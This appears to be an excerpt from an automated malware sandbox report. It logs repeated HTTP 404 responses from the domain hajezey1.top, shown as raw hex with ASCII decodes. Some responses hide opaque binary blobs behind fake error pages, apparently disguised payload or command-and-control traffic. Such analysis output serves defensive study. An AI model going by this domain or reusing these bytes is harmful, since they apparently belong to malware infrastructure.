65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 
57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 